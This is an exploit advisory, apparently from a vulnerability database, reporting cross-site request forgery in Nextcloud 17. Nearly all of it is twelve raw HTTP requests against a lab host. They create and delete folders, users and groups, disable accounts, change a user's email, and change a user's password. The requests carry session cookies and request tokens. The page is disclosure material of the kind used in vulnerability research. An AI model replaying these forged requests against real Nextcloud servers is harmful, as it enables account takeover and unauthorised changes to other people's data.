Nextcloud 17 Cross-Site Request Forgery

2019.11.09
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery # Date: 08.11.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://nextcloud.com # Software Link: https://nextcloud.com/install/#instructions-server # Version: 17 # CVE: N/A #Nextcloud offers the industry-leading, on-premises content collaboration platform. #Our technology combines the convenience and ease of use of consumer-grade solutions like Dropbox and Google Drive with the security, privacy and control business #needs. ################################################################################################################################## # CSRF1 # Create Folder MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF2 # Delete Folder DELETE /remote.php/dav/files/ogoker/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF3 # Create User POST /ocs/v2.php/cloud/users HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= Content-Length: 129 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 {"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"} ################################################################################################################################## # CSRF4 # Delete User DELETE /ocs/v2.php/cloud/users/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 ################################################################################################################################## # CSRF5 # Disable User PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 Content-Length: 0 ################################################################################################################################## # CSRF6 # Enable User PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1 Content-Length: 0 ################################################################################################################################## # CSRF7 # Create Group POST /ocs/v2.php/cloud/groups HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= Content-Length: 18 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"groupid":"test"} ################################################################################################################################## # CSRF8 # Delete Group DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g= Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 ################################################################################################################################## # CSRF9 # Change User Full Name PUT /settings/users/ogoker/settings HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json requesttoken: nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 266 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"displayname":"Ozer Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} ################################################################################################################################## # CSRF10 # Change User Email PUT /settings/users/ogoker/settings HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json requesttoken: I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 271 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 {"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test ","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"} ################################################################################################################################## # CSRF11 # Change Language PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 21 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 key=language&value=tr ################################################################################################################################## # CSRF12 # Change User Password POST /settings/personal/changepassword HTTP/1.1 Host: 192.168.2.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: 0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 70 Connection: close Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1 oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678 ##################################################################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top